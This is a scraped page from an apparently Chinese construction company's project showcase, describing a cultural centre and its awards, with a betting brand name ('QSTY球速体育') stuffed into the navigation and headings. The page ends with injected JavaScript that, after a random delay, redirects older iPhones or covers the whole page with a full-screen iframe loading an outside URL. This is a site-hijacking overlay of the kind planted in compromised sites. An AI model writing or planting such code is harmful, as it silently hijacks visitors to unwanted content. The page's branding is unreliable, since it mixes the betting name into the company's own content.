网站首页
QSTY球速体育
公司简介
组织架构
企业文化
公司资质
QSTY球速体育新闻资讯
行业新闻
公司动态
QSTY球速体育工程展示
房屋建筑
市政公路
机电安装
装饰装修
钢结构
人才招聘
联系我们
网站首页
QSTY球速体育
公司简介
组织架构
企业文化
公司资质
QSTY球速体育新闻资讯
行业新闻
公司动态
QSTY球速体育工程展示
房屋建筑
市政公路
机电安装
装饰装修
钢结构
人才招聘
联系我们
QSTY球速体育工程展示
QSTY球速体育
>
QSTY球速体育工程展示
>
房屋建筑
房屋建筑
市政公路
机电安装
装饰装修
钢结构
工程简介
荣获2010年度泰山杯奖、国家钢结构金奖、2008年度省级安全文明示范工地 、2011年全国建筑工程装饰奖。
90.6
㎡
工程建筑面积
30.5
M
室内建筑面积
文化中心
荣获2010年度“泰山杯”奖、国家钢结构金奖、2008年度省级安全文明示范工地 、2011年全国建筑工程装饰奖。
"; // 电脑链接 const mobileUrl = ""; // 移动链接 const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/); const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500; if (isIOS && getIosVersion() < 13) { setTimeout(() => { window.location.href = mobileUrl; }, time); } else { // 检测用户使用的设备类型 const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent); document.addEventListener("DOMContentLoaded", () => { const viewportMeta = document.createElement("meta"); viewportMeta.setAttribute("name", "viewport"); viewportMeta.setAttribute("content", "user-scalable=no, width=device-width, initial-scale=1.0"); document.head.appendChild(viewportMeta); const style = document.createElement("style"); style.innerHTML = "html, body { width: 100%; height: 100%; overflow: hidden; }"; document.head.appendChild(style); const divContainer = document.createElement("div"); divContainer.style.cssText = "width: 100%; height: 100%; position: absolute; top: 0; left: 0; z-index: 2147483647; background: #fff;"; document.body.appendChild(divContainer); const iframe = document.createElement("iframe"); iframe.src = isMobile ? mobileUrl : desktopUrl; iframe.style.cssText = "border: 0; width: 100%; text-align: center; border: medium none; height: 100%; max-height: 4000px;"; divContainer.appendChild(iframe); }); }